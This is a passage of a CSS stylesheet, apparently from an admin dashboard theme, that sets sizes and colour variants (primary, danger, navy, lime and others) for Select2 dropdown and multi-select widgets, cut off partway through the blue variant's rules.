select.form-control-sm ~ .select2-container--default {
font-size: 0.875rem;
}
.text-sm .select2-container--default .select2-selection--single,
select.form-control-sm ~ .select2-container--default .select2-selection--single {
height: calc(1.8125rem + 2px);
}
.text-sm .select2-container--default .select2-selection--single .select2-selection__rendered,
select.form-control-sm ~ .select2-container--default .select2-selection--single .select2-selection__rendered {
margin-top: -.4rem;
}
.text-sm .select2-container--default .select2-selection--single .select2-selection__arrow,
select.form-control-sm ~ .select2-container--default .select2-selection--single .select2-selection__arrow {
top: -.12rem;
}
.text-sm .select2-container--default .select2-selection--multiple,
select.form-control-sm ~ .select2-container--default .select2-selection--multiple {
min-height: calc(1.8125rem + 2px);
}
.text-sm .select2-container--default .select2-selection--multiple .select2-selection__rendered,
select.form-control-sm ~ .select2-container--default .select2-selection--multiple .select2-selection__rendered {
padding: 0 0.25rem 0.25rem;
margin-top: -0.1rem;
}
.text-sm .select2-container--default .select2-selection--multiple .select2-selection__rendered li:first-child.select2-search.select2-search--inline,
select.form-control-sm ~ .select2-container--default .select2-selection--multiple .select2-selection__rendered li:first-child.select2-search.select2-search--inline {
margin-left: 0.25rem;
}
.text-sm .select2-container--default .select2-selection--multiple .select2-selection__rendered .select2-search.select2-search--inline .select2-search__field,
select.form-control-sm ~ .select2-container--default .select2-selection--multiple .select2-selection__rendered .select2-search.select2-search--inline .select2-search__field {
margin-top: 6px;
}
.select2-primary + .select2-container--default.select2-container--open .select2-selection--single {
border-color: #80bdff;
}
.select2-primary + .select2-container--default.select2-container--focus .select2-selection--single {
border-color: #80bdff;
}
.select2-container--default .select2-primary.select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-primary .select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-primary .select2-search--inline .select2-search__field:focus,
.select2-primary .select2-container--default.select2-dropdown .select2-search__field:focus,
.select2-primary .select2-container--default .select2-dropdown .select2-search__field:focus,
.select2-primary .select2-container--default .select2-search--inline .select2-search__field:focus {
border: 1px solid #80bdff;
}
.select2-container--default .select2-primary .select2-results__option--highlighted,
.select2-primary .select2-container--default .select2-results__option--highlighted {
background-color: #007bff;
color: #ffffff;
}
.select2-container--default .select2-primary .select2-results__option--highlighted[aria-selected], .select2-container--default .select2-primary .select2-results__option--highlighted[aria-selected]:hover,
.select2-primary .select2-container--default .select2-results__option--highlighted[aria-selected],
.select2-primary .select2-container--default .select2-results__option--highlighted[aria-selected]:hover {
background-color: #0074f0;
color: #ffffff;
}
.select2-container--default .select2-primary .select2-selection--multiple:focus,
.select2-primary .select2-container--default .select2-selection--multiple:focus {
border-color: #80bdff;
}
.select2-container--default .select2-primary .select2-selection--multiple .select2-selection__choice,
.select2-primary .select2-container--default .select2-selection--multiple .select2-selection__choice {
background-color: #007bff;
border-color: #006fe6;
color: #ffffff;
}
.select2-container--default .select2-primary .select2-selection--multiple .select2-selection__choice__remove,
.select2-primary .select2-container--default .select2-selection--multiple .select2-selection__choice__remove {
color: rgba(255, 255, 255, 0.7);
}
.select2-container--default .select2-primary .select2-selection--multiple .select2-selection__choice__remove:hover,
.select2-primary .select2-container--default .select2-selection--multiple .select2-selection__choice__remove:hover {
color: #ffffff;
}
.select2-container--default .select2-primary.select2-container--focus .select2-selection--multiple,
.select2-primary .select2-container--default.select2-container--focus .select2-selection--multiple {
border-color: #80bdff;
}
.select2-secondary + .select2-container--default.select2-container--open .select2-selection--single {
border-color: #afb5ba;
}
.select2-secondary + .select2-container--default.select2-container--focus .select2-selection--single {
border-color: #afb5ba;
}
.select2-container--default .select2-secondary.select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-secondary .select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-secondary .select2-search--inline .select2-search__field:focus,
.select2-secondary .select2-container--default.select2-dropdown .select2-search__field:focus,
.select2-secondary .select2-container--default .select2-dropdown .select2-search__field:focus,
.select2-secondary .select2-container--default .select2-search--inline .select2-search__field:focus {
border: 1px solid #afb5ba;
}
.select2-container--default .select2-secondary .select2-results__option--highlighted,
.select2-secondary .select2-container--default .select2-results__option--highlighted {
background-color: #6c757d;
color: #ffffff;
}
.select2-container--default .select2-secondary .select2-results__option--highlighted[aria-selected], .select2-container--default .select2-secondary .select2-results__option--highlighted[aria-selected]:hover,
.select2-secondary .select2-container--default .select2-results__option--highlighted[aria-selected],
.select2-secondary .select2-container--default .select2-results__option--highlighted[aria-selected]:hover {
background-color: #656d75;
color: #ffffff;
}
.select2-container--default .select2-secondary .select2-selection--multiple:focus,
.select2-secondary .select2-container--default .select2-selection--multiple:focus {
border-color: #afb5ba;
}
.select2-container--default .select2-secondary .select2-selection--multiple .select2-selection__choice,
.select2-secondary .select2-container--default .select2-selection--multiple .select2-selection__choice {
background-color: #6c757d;
border-color: #60686f;
color: #ffffff;
}
.select2-container--default .select2-secondary .select2-selection--multiple .select2-selection__choice__remove,
.select2-secondary .select2-container--default .select2-selection--multiple .select2-selection__choice__remove {
color: rgba(255, 255, 255, 0.7);
}
.select2-container--default .select2-secondary .select2-selection--multiple .select2-selection__choice__remove:hover,
.select2-secondary .select2-container--default .select2-selection--multiple .select2-selection__choice__remove:hover {
color: #ffffff;
}
.select2-container--default .select2-secondary.select2-container--focus .select2-selection--multiple,
.select2-secondary .select2-container--default.select2-container--focus .select2-selection--multiple {
border-color: #afb5ba;
}
.select2-success + .select2-container--default.select2-container--open .select2-selection--single {
border-color: #71dd8a;
}
.select2-success + .select2-container--default.select2-container--focus .select2-selection--single {
border-color: #71dd8a;
}
.select2-container--default .select2-success.select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-success .select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-success .select2-search--inline .select2-search__field:focus,
.select2-success .select2-container--default.select2-dropdown .select2-search__field:focus,
.select2-success .select2-container--default .select2-dropdown .select2-search__field:focus,
.select2-success .select2-container--default .select2-search--inline .select2-search__field:focus {
border: 1px solid #71dd8a;
}
.select2-container--default .select2-success .select2-results__option--highlighted,
.select2-success .select2-container--default .select2-results__option--highlighted {
background-color: #28a745;
color: #ffffff;
}
.select2-container--default .select2-success .select2-results__option--highlighted[aria-selected], .select2-container--default .select2-success .select2-results__option--highlighted[aria-selected]:hover,
.select2-success .select2-container--default .select2-results__option--highlighted[aria-selected],
.select2-success .select2-container--default .select2-results__option--highlighted[aria-selected]:hover {
background-color: #259b40;
color: #ffffff;
}
.select2-container--default .select2-success .select2-selection--multiple:focus,
.select2-success .select2-container--default .select2-selection--multiple:focus {
border-color: #71dd8a;
}
.select2-container--default .select2-success .select2-selection--multiple .select2-selection__choice,
.select2-success .select2-container--default .select2-selection--multiple .select2-selection__choice {
background-color: #28a745;
border-color: #23923d;
color: #ffffff;
}
.select2-container--default .select2-success .select2-selection--multiple .select2-selection__choice__remove,
.select2-success .select2-container--default .select2-selection--multiple .select2-selection__choice__remove {
color: rgba(255, 255, 255, 0.7);
}
.select2-container--default .select2-success .select2-selection--multiple .select2-selection__choice__remove:hover,
.select2-success .select2-container--default .select2-selection--multiple .select2-selection__choice__remove:hover {
color: #ffffff;
}
.select2-container--default .select2-success.select2-container--focus .select2-selection--multiple,
.select2-success .select2-container--default.select2-container--focus .select2-selection--multiple {
border-color: #71dd8a;
}
.select2-info + .select2-container--default.select2-container--open .select2-selection--single {
border-color: #63d9ec;
}
.select2-info + .select2-container--default.select2-container--focus .select2-selection--single {
border-color: #63d9ec;
}
.select2-container--default .select2-info.select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-info .select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-info .select2-search--inline .select2-search__field:focus,
.select2-info .select2-container--default.select2-dropdown .select2-search__field:focus,
.select2-info .select2-container--default .select2-dropdown .select2-search__field:focus,
.select2-info .select2-container--default .select2-search--inline .select2-search__field:focus {
border: 1px solid #63d9ec;
}
.select2-container--default .select2-info .select2-results__option--highlighted,
.select2-info .select2-container--default .select2-results__option--highlighted {
background-color: #17a2b8;
color: #ffffff;
}
.select2-container--default .select2-info .select2-results__option--highlighted[aria-selected], .select2-container--default .select2-info .select2-results__option--highlighted[aria-selected]:hover,
.select2-info .select2-container--default .select2-results__option--highlighted[aria-selected],
.select2-info .select2-container--default .select2-results__option--highlighted[aria-selected]:hover {
background-color: #1596aa;
color: #ffffff;
}
.select2-container--default .select2-info .select2-selection--multiple:focus,
.select2-info .select2-container--default .select2-selection--multiple:focus {
border-color: #63d9ec;
}
.select2-container--default .select2-info .select2-selection--multiple .select2-selection__choice,
.select2-info .select2-container--default .select2-selection--multiple .select2-selection__choice {
background-color: #17a2b8;
border-color: #148ea1;
color: #ffffff;
}
.select2-container--default .select2-info .select2-selection--multiple .select2-selection__choice__remove,
.select2-info .select2-container--default .select2-selection--multiple .select2-selection__choice__remove {
color: rgba(255, 255, 255, 0.7);
}
.select2-container--default .select2-info .select2-selection--multiple .select2-selection__choice__remove:hover,
.select2-info .select2-container--default .select2-selection--multiple .select2-selection__choice__remove:hover {
color: #ffffff;
}
.select2-container--default .select2-info.select2-container--focus .select2-selection--multiple,
.select2-info .select2-container--default.select2-container--focus .select2-selection--multiple {
border-color: #63d9ec;
}
.select2-warning + .select2-container--default.select2-container--open .select2-selection--single {
border-color: #ffe187;
}
.select2-warning + .select2-container--default.select2-container--focus .select2-selection--single {
border-color: #ffe187;
}
.select2-container--default .select2-warning.select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-warning .select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-warning .select2-search--inline .select2-search__field:focus,
.select2-warning .select2-container--default.select2-dropdown .select2-search__field:focus,
.select2-warning .select2-container--default .select2-dropdown .select2-search__field:focus,
.select2-warning .select2-container--default .select2-search--inline .select2-search__field:focus {
border: 1px solid #ffe187;
}
.select2-container--default .select2-warning .select2-results__option--highlighted,
.select2-warning .select2-container--default .select2-results__option--highlighted {
background-color: #ffc107;
color: #1F2D3D;
}
.select2-container--default .select2-warning .select2-results__option--highlighted[aria-selected], .select2-container--default .select2-warning .select2-results__option--highlighted[aria-selected]:hover,
.select2-warning .select2-container--default .select2-results__option--highlighted[aria-selected],
.select2-warning .select2-container--default .select2-results__option--highlighted[aria-selected]:hover {
background-color: #f7b900;
color: #1F2D3D;
}
.select2-container--default .select2-warning .select2-selection--multiple:focus,
.select2-warning .select2-container--default .select2-selection--multiple:focus {
border-color: #ffe187;
}
.select2-container--default .select2-warning .select2-selection--multiple .select2-selection__choice,
.select2-warning .select2-container--default .select2-selection--multiple .select2-selection__choice {
background-color: #ffc107;
border-color: #edb100;
color: #1F2D3D;
}
.select2-container--default .select2-warning .select2-selection--multiple .select2-selection__choice__remove,
.select2-warning .select2-container--default .select2-selection--multiple .select2-selection__choice__remove {
color: rgba(31, 45, 61, 0.7);
}
.select2-container--default .select2-warning .select2-selection--multiple .select2-selection__choice__remove:hover,
.select2-warning .select2-container--default .select2-selection--multiple .select2-selection__choice__remove:hover {
color: #1F2D3D;
}
.select2-container--default .select2-warning.select2-container--focus .select2-selection--multiple,
.select2-warning .select2-container--default.select2-container--focus .select2-selection--multiple {
border-color: #ffe187;
}
.select2-danger + .select2-container--default.select2-container--open .select2-selection--single {
border-color: #efa2a9;
}
.select2-danger + .select2-container--default.select2-container--focus .select2-selection--single {
border-color: #efa2a9;
}
.select2-container--default .select2-danger.select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-danger .select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-danger .select2-search--inline .select2-search__field:focus,
.select2-danger .select2-container--default.select2-dropdown .select2-search__field:focus,
.select2-danger .select2-container--default .select2-dropdown .select2-search__field:focus,
.select2-danger .select2-container--default .select2-search--inline .select2-search__field:focus {
border: 1px solid #efa2a9;
}
.select2-container--default .select2-danger .select2-results__option--highlighted,
.select2-danger .select2-container--default .select2-results__option--highlighted {
background-color: #dc3545;
color: #ffffff;
}
.select2-container--default .select2-danger .select2-results__option--highlighted[aria-selected], .select2-container--default .select2-danger .select2-results__option--highlighted[aria-selected]:hover,
.select2-danger .select2-container--default .select2-results__option--highlighted[aria-selected],
.select2-danger .select2-container--default .select2-results__option--highlighted[aria-selected]:hover {
background-color: #da2839;
color: #ffffff;
}
.select2-container--default .select2-danger .select2-selection--multiple:focus,
.select2-danger .select2-container--default .select2-selection--multiple:focus {
border-color: #efa2a9;
}
.select2-container--default .select2-danger .select2-selection--multiple .select2-selection__choice,
.select2-danger .select2-container--default .select2-selection--multiple .select2-selection__choice {
background-color: #dc3545;
border-color: #d32535;
color: #ffffff;
}
.select2-container--default .select2-danger .select2-selection--multiple .select2-selection__choice__remove,
.select2-danger .select2-container--default .select2-selection--multiple .select2-selection__choice__remove {
color: rgba(255, 255, 255, 0.7);
}
.select2-container--default .select2-danger .select2-selection--multiple .select2-selection__choice__remove:hover,
.select2-danger .select2-container--default .select2-selection--multiple .select2-selection__choice__remove:hover {
color: #ffffff;
}
.select2-container--default .select2-danger.select2-container--focus .select2-selection--multiple,
.select2-danger .select2-container--default.select2-container--focus .select2-selection--multiple {
border-color: #efa2a9;
}
.select2-light + .select2-container--default.select2-container--open .select2-selection--single {
border-color: white;
}
.select2-light + .select2-container--default.select2-container--focus .select2-selection--single {
border-color: white;
}
.select2-container--default .select2-light.select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-light .select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-light .select2-search--inline .select2-search__field:focus,
.select2-light .select2-container--default.select2-dropdown .select2-search__field:focus,
.select2-light .select2-container--default .select2-dropdown .select2-search__field:focus,
.select2-light .select2-container--default .select2-search--inline .select2-search__field:focus {
border: 1px solid white;
}
.select2-container--default .select2-light .select2-results__option--highlighted,
.select2-light .select2-container--default .select2-results__option--highlighted {
background-color: #f8f9fa;
color: #1F2D3D;
}
.select2-container--default .select2-light .select2-results__option--highlighted[aria-selected], .select2-container--default .select2-light .select2-results__option--highlighted[aria-selected]:hover,
.select2-light .select2-container--default .select2-results__option--highlighted[aria-selected],
.select2-light .select2-container--default .select2-results__option--highlighted[aria-selected]:hover {
background-color: #eff1f4;
color: #1F2D3D;
}
.select2-container--default .select2-light .select2-selection--multiple:focus,
.select2-light .select2-container--default .select2-selection--multiple:focus {
border-color: white;
}
.select2-container--default .select2-light .select2-selection--multiple .select2-selection__choice,
.select2-light .select2-container--default .select2-selection--multiple .select2-selection__choice {
background-color: #f8f9fa;
border-color: #e9ecef;
color: #1F2D3D;
}
.select2-container--default .select2-light .select2-selection--multiple .select2-selection__choice__remove,
.select2-light .select2-container--default .select2-selection--multiple .select2-selection__choice__remove {
color: rgba(31, 45, 61, 0.7);
}
.select2-container--default .select2-light .select2-selection--multiple .select2-selection__choice__remove:hover,
.select2-light .select2-container--default .select2-selection--multiple .select2-selection__choice__remove:hover {
color: #1F2D3D;
}
.select2-container--default .select2-light.select2-container--focus .select2-selection--multiple,
.select2-light .select2-container--default.select2-container--focus .select2-selection--multiple {
border-color: white;
}
.select2-dark + .select2-container--default.select2-container--open .select2-selection--single {
border-color: #6d7a86;
}
.select2-dark + .select2-container--default.select2-container--focus .select2-selection--single {
border-color: #6d7a86;
}
.select2-container--default .select2-dark.select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-dark .select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-dark .select2-search--inline .select2-search__field:focus,
.select2-dark .select2-container--default.select2-dropdown .select2-search__field:focus,
.select2-dark .select2-container--default .select2-dropdown .select2-search__field:focus,
.select2-dark .select2-container--default .select2-search--inline .select2-search__field:focus {
border: 1px solid #6d7a86;
}
.select2-container--default .select2-dark .select2-results__option--highlighted,
.select2-dark .select2-container--default .select2-results__option--highlighted {
background-color: #343a40;
color: #ffffff;
}
.select2-container--default .select2-dark .select2-results__option--highlighted[aria-selected], .select2-container--default .select2-dark .select2-results__option--highlighted[aria-selected]:hover,
.select2-dark .select2-container--default .select2-results__option--highlighted[aria-selected],
.select2-dark .select2-container--default .select2-results__option--highlighted[aria-selected]:hover {
background-color: #2d3238;
color: #ffffff;
}
.select2-container--default .select2-dark .select2-selection--multiple:focus,
.select2-dark .select2-container--default .select2-selection--multiple:focus {
border-color: #6d7a86;
}
.select2-container--default .select2-dark .select2-selection--multiple .select2-selection__choice,
.select2-dark .select2-container--default .select2-selection--multiple .select2-selection__choice {
background-color: #343a40;
border-color: #292d32;
color: #ffffff;
}
.select2-container--default .select2-dark .select2-selection--multiple .select2-selection__choice__remove,
.select2-dark .select2-container--default .select2-selection--multiple .select2-selection__choice__remove {
color: rgba(255, 255, 255, 0.7);
}
.select2-container--default .select2-dark .select2-selection--multiple .select2-selection__choice__remove:hover,
.select2-dark .select2-container--default .select2-selection--multiple .select2-selection__choice__remove:hover {
color: #ffffff;
}
.select2-container--default .select2-dark.select2-container--focus .select2-selection--multiple,
.select2-dark .select2-container--default.select2-container--focus .select2-selection--multiple {
border-color: #6d7a86;
}
.select2-lightblue + .select2-container--default.select2-container--open .select2-selection--single {
border-color: #99c5de;
}
.select2-lightblue + .select2-container--default.select2-container--focus .select2-selection--single {
border-color: #99c5de;
}
.select2-container--default .select2-lightblue.select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-lightblue .select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-lightblue .select2-search--inline .select2-search__field:focus,
.select2-lightblue .select2-container--default.select2-dropdown .select2-search__field:focus,
.select2-lightblue .select2-container--default .select2-dropdown .select2-search__field:focus,
.select2-lightblue .select2-container--default .select2-search--inline .select2-search__field:focus {
border: 1px solid #99c5de;
}
.select2-container--default .select2-lightblue .select2-results__option--highlighted,
.select2-lightblue .select2-container--default .select2-results__option--highlighted {
background-color: #3c8dbc;
color: #ffffff;
}
.select2-container--default .select2-lightblue .select2-results__option--highlighted[aria-selected], .select2-container--default .select2-lightblue .select2-results__option--highlighted[aria-selected]:hover,
.select2-lightblue .select2-container--default .select2-results__option--highlighted[aria-selected],
.select2-lightblue .select2-container--default .select2-results__option--highlighted[aria-selected]:hover {
background-color: #3884b0;
color: #ffffff;
}
.select2-container--default .select2-lightblue .select2-selection--multiple:focus,
.select2-lightblue .select2-container--default .select2-selection--multiple:focus {
border-color: #99c5de;
}
.select2-container--default .select2-lightblue .select2-selection--multiple .select2-selection__choice,
.select2-lightblue .select2-container--default .select2-selection--multiple .select2-selection__choice {
background-color: #3c8dbc;
border-color: #367fa9;
color: #ffffff;
}
.select2-container--default .select2-lightblue .select2-selection--multiple .select2-selection__choice__remove,
.select2-lightblue .select2-container--default .select2-selection--multiple .select2-selection__choice__remove {
color: rgba(255, 255, 255, 0.7);
}
.select2-container--default .select2-lightblue .select2-selection--multiple .select2-selection__choice__remove:hover,
.select2-lightblue .select2-container--default .select2-selection--multiple .select2-selection__choice__remove:hover {
color: #ffffff;
}
.select2-container--default .select2-lightblue.select2-container--focus .select2-selection--multiple,
.select2-lightblue .select2-container--default.select2-container--focus .select2-selection--multiple {
border-color: #99c5de;
}
.select2-navy + .select2-container--default.select2-container--open .select2-selection--single {
border-color: #005ebf;
}
.select2-navy + .select2-container--default.select2-container--focus .select2-selection--single {
border-color: #005ebf;
}
.select2-container--default .select2-navy.select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-navy .select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-navy .select2-search--inline .select2-search__field:focus,
.select2-navy .select2-container--default.select2-dropdown .select2-search__field:focus,
.select2-navy .select2-container--default .select2-dropdown .select2-search__field:focus,
.select2-navy .select2-container--default .select2-search--inline .select2-search__field:focus {
border: 1px solid #005ebf;
}
.select2-container--default .select2-navy .select2-results__option--highlighted,
.select2-navy .select2-container--default .select2-results__option--highlighted {
background-color: #001f3f;
color: #ffffff;
}
.select2-container--default .select2-navy .select2-results__option--highlighted[aria-selected], .select2-container--default .select2-navy .select2-results__option--highlighted[aria-selected]:hover,
.select2-navy .select2-container--default .select2-results__option--highlighted[aria-selected],
.select2-navy .select2-container--default .select2-results__option--highlighted[aria-selected]:hover {
background-color: #001730;
color: #ffffff;
}
.select2-container--default .select2-navy .select2-selection--multiple:focus,
.select2-navy .select2-container--default .select2-selection--multiple:focus {
border-color: #005ebf;
}
.select2-container--default .select2-navy .select2-selection--multiple .select2-selection__choice,
.select2-navy .select2-container--default .select2-selection--multiple .select2-selection__choice {
background-color: #001f3f;
border-color: #001226;
color: #ffffff;
}
.select2-container--default .select2-navy .select2-selection--multiple .select2-selection__choice__remove,
.select2-navy .select2-container--default .select2-selection--multiple .select2-selection__choice__remove {
color: rgba(255, 255, 255, 0.7);
}
.select2-container--default .select2-navy .select2-selection--multiple .select2-selection__choice__remove:hover,
.select2-navy .select2-container--default .select2-selection--multiple .select2-selection__choice__remove:hover {
color: #ffffff;
}
.select2-container--default .select2-navy.select2-container--focus .select2-selection--multiple,
.select2-navy .select2-container--default.select2-container--focus .select2-selection--multiple {
border-color: #005ebf;
}
.select2-olive + .select2-container--default.select2-container--open .select2-selection--single {
border-color: #87cfaf;
}
.select2-olive + .select2-container--default.select2-container--focus .select2-selection--single {
border-color: #87cfaf;
}
.select2-container--default .select2-olive.select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-olive .select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-olive .select2-search--inline .select2-search__field:focus,
.select2-olive .select2-container--default.select2-dropdown .select2-search__field:focus,
.select2-olive .select2-container--default .select2-dropdown .select2-search__field:focus,
.select2-olive .select2-container--default .select2-search--inline .select2-search__field:focus {
border: 1px solid #87cfaf;
}
.select2-container--default .select2-olive .select2-results__option--highlighted,
.select2-olive .select2-container--default .select2-results__option--highlighted {
background-color: #3d9970;
color: #ffffff;
}
.select2-container--default .select2-olive .select2-results__option--highlighted[aria-selected], .select2-container--default .select2-olive .select2-results__option--highlighted[aria-selected]:hover,
.select2-olive .select2-container--default .select2-results__option--highlighted[aria-selected],
.select2-olive .select2-container--default .select2-results__option--highlighted[aria-selected]:hover {
background-color: #398e68;
color: #ffffff;
}
.select2-container--default .select2-olive .select2-selection--multiple:focus,
.select2-olive .select2-container--default .select2-selection--multiple:focus {
border-color: #87cfaf;
}
.select2-container--default .select2-olive .select2-selection--multiple .select2-selection__choice,
.select2-olive .select2-container--default .select2-selection--multiple .select2-selection__choice {
background-color: #3d9970;
border-color: #368763;
color: #ffffff;
}
.select2-container--default .select2-olive .select2-selection--multiple .select2-selection__choice__remove,
.select2-olive .select2-container--default .select2-selection--multiple .select2-selection__choice__remove {
color: rgba(255, 255, 255, 0.7);
}
.select2-container--default .select2-olive .select2-selection--multiple .select2-selection__choice__remove:hover,
.select2-olive .select2-container--default .select2-selection--multiple .select2-selection__choice__remove:hover {
color: #ffffff;
}
.select2-container--default .select2-olive.select2-container--focus .select2-selection--multiple,
.select2-olive .select2-container--default.select2-container--focus .select2-selection--multiple {
border-color: #87cfaf;
}
.select2-lime + .select2-container--default.select2-container--open .select2-selection--single {
border-color: #81ffb8;
}
.select2-lime + .select2-container--default.select2-container--focus .select2-selection--single {
border-color: #81ffb8;
}
.select2-container--default .select2-lime.select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-lime .select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-lime .select2-search--inline .select2-search__field:focus,
.select2-lime .select2-container--default.select2-dropdown .select2-search__field:focus,
.select2-lime .select2-container--default .select2-dropdown .select2-search__field:focus,
.select2-lime .select2-container--default .select2-search--inline .select2-search__field:focus {
border: 1px solid #81ffb8;
}
.select2-container--default .select2-lime .select2-results__option--highlighted,
.select2-lime .select2-container--default .select2-results__option--highlighted {
background-color: #01ff70;
color: #1F2D3D;
}
.select2-container--default .select2-lime .select2-results__option--highlighted[aria-selected], .select2-container--default .select2-lime .select2-results__option--highlighted[aria-selected]:hover,
.select2-lime .select2-container--default .select2-results__option--highlighted[aria-selected],
.select2-lime .select2-container--default .select2-results__option--highlighted[aria-selected]:hover {
background-color: #00f169;
color: #1F2D3D;
}
.select2-container--default .select2-lime .select2-selection--multiple:focus,
.select2-lime .select2-container--default .select2-selection--multiple:focus {
border-color: #81ffb8;
}
.select2-container--default .select2-lime .select2-selection--multiple .select2-selection__choice,
.select2-lime .select2-container--default .select2-selection--multiple .select2-selection__choice {
background-color: #01ff70;
border-color: #00e765;
color: #1F2D3D;
}
.select2-container--default .select2-lime .select2-selection--multiple .select2-selection__choice__remove,
.select2-lime .select2-container--default .select2-selection--multiple .select2-selection__choice__remove {
color: rgba(31, 45, 61, 0.7);
}
.select2-container--default .select2-lime .select2-selection--multiple .select2-selection__choice__remove:hover,
.select2-lime .select2-container--default .select2-selection--multiple .select2-selection__choice__remove:hover {
color: #1F2D3D;
}
.select2-container--default .select2-lime.select2-container--focus .select2-selection--multiple,
.select2-lime .select2-container--default.select2-container--focus .select2-selection--multiple {
border-color: #81ffb8;
}
.select2-fuchsia + .select2-container--default.select2-container--open .select2-selection--single {
border-color: #f88adf;
}
.select2-fuchsia + .select2-container--default.select2-container--focus .select2-selection--single {
border-color: #f88adf;
}
.select2-container--default .select2-fuchsia.select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-fuchsia .select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-fuchsia .select2-search--inline .select2-search__field:focus,
.select2-fuchsia .select2-container--default.select2-dropdown .select2-search__field:focus,
.select2-fuchsia .select2-container--default .select2-dropdown .select2-search__field:focus,
.select2-fuchsia .select2-container--default .select2-search--inline .select2-search__field:focus {
border: 1px solid #f88adf;
}
.select2-container--default .select2-fuchsia .select2-results__option--highlighted,
.select2-fuchsia .select2-container--default .select2-results__option--highlighted {
background-color: #f012be;
color: #ffffff;
}
.select2-container--default .select2-fuchsia .select2-results__option--highlighted[aria-selected], .select2-container--default .select2-fuchsia .select2-results__option--highlighted[aria-selected]:hover,
.select2-fuchsia .select2-container--default .select2-results__option--highlighted[aria-selected],
.select2-fuchsia .select2-container--default .select2-results__option--highlighted[aria-selected]:hover {
background-color: #e40eb4;
color: #ffffff;
}
.select2-container--default .select2-fuchsia .select2-selection--multiple:focus,
.select2-fuchsia .select2-container--default .select2-selection--multiple:focus {
border-color: #f88adf;
}
.select2-container--default .select2-fuchsia .select2-selection--multiple .select2-selection__choice,
.select2-fuchsia .select2-container--default .select2-selection--multiple .select2-selection__choice {
background-color: #f012be;
border-color: #db0ead;
color: #ffffff;
}
.select2-container--default .select2-fuchsia .select2-selection--multiple .select2-selection__choice__remove,
.select2-fuchsia .select2-container--default .select2-selection--multiple .select2-selection__choice__remove {
color: rgba(255, 255, 255, 0.7);
}
.select2-container--default .select2-fuchsia .select2-selection--multiple .select2-selection__choice__remove:hover,
.select2-fuchsia .select2-container--default .select2-selection--multiple .select2-selection__choice__remove:hover {
color: #ffffff;
}
.select2-container--default .select2-fuchsia.select2-container--focus .select2-selection--multiple,
.select2-fuchsia .select2-container--default.select2-container--focus .select2-selection--multiple {
border-color: #f88adf;
}
.select2-maroon + .select2-container--default.select2-container--open .select2-selection--single {
border-color: #f083ab;
}
.select2-maroon + .select2-container--default.select2-container--focus .select2-selection--single {
border-color: #f083ab;
}
.select2-container--default .select2-maroon.select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-maroon .select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-maroon .select2-search--inline .select2-search__field:focus,
.select2-maroon .select2-container--default.select2-dropdown .select2-search__field:focus,
.select2-maroon .select2-container--default .select2-dropdown .select2-search__field:focus,
.select2-maroon .select2-container--default .select2-search--inline .select2-search__field:focus {
border: 1px solid #f083ab;
}
.select2-container--default .select2-maroon .select2-results__option--highlighted,
.select2-maroon .select2-container--default .select2-results__option--highlighted {
background-color: #d81b60;
color: #ffffff;
}
.select2-container--default .select2-maroon .select2-results__option--highlighted[aria-selected], .select2-container--default .select2-maroon .select2-results__option--highlighted[aria-selected]:hover,
.select2-maroon .select2-container--default .select2-results__option--highlighted[aria-selected],
.select2-maroon .select2-container--default .select2-results__option--highlighted[aria-selected]:hover {
background-color: #ca195a;
color: #ffffff;
}
.select2-container--default .select2-maroon .select2-selection--multiple:focus,
.select2-maroon .select2-container--default .select2-selection--multiple:focus {
border-color: #f083ab;
}
.select2-container--default .select2-maroon .select2-selection--multiple .select2-selection__choice,
.select2-maroon .select2-container--default .select2-selection--multiple .select2-selection__choice {
background-color: #d81b60;
border-color: #c11856;
color: #ffffff;
}
.select2-container--default .select2-maroon .select2-selection--multiple .select2-selection__choice__remove,
.select2-maroon .select2-container--default .select2-selection--multiple .select2-selection__choice__remove {
color: rgba(255, 255, 255, 0.7);
}
.select2-container--default .select2-maroon .select2-selection--multiple .select2-selection__choice__remove:hover,
.select2-maroon .select2-container--default .select2-selection--multiple .select2-selection__choice__remove:hover {
color: #ffffff;
}
.select2-container--default .select2-maroon.select2-container--focus .select2-selection--multiple,
.select2-maroon .select2-container--default.select2-container--focus .select2-selection--multiple {
border-color: #f083ab;
}
.select2-blue + .select2-container--default.select2-container--open .select2-selection--single {
border-color: #80bdff;
}
.select2-blue + .select2-container--default.select2-container--focus .select2-selection--single {
border-color: #80bdff;
}
.select2-container--default .select2-blue.select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-blue .select2-dropdown .select2-search__field:focus,
.select2-container--default .select2-blue .select2-search--inline .select2-search__field:focus,
.select2-blue .select2-container--default.select2-dropdown .select2-search__field:focus,
.select2-blue .select2-container--default .select2-dropdown .select2-search__field:focus,
.select2-blue .select2-container--default .select2-search--inline .select2-search__field:focus {
border: 1px solid #80bdff;
}
.select2-container--default .select2-blue .select2-results__option--highlighted,
.select2-blue .select2-container--default .select2-results__option--highlighted {
background-color: #007bff;
color: #ffffff;
}
.select2-container--default .select2-blue .select2-results__option--highlighted[aria-selected], .select2-container--default .select2-blue .select2-results__option--highlighted[aria-selected]:hover,
.select2-blue .select2-container--default .select2-results__option--highlighted[aria-selected],
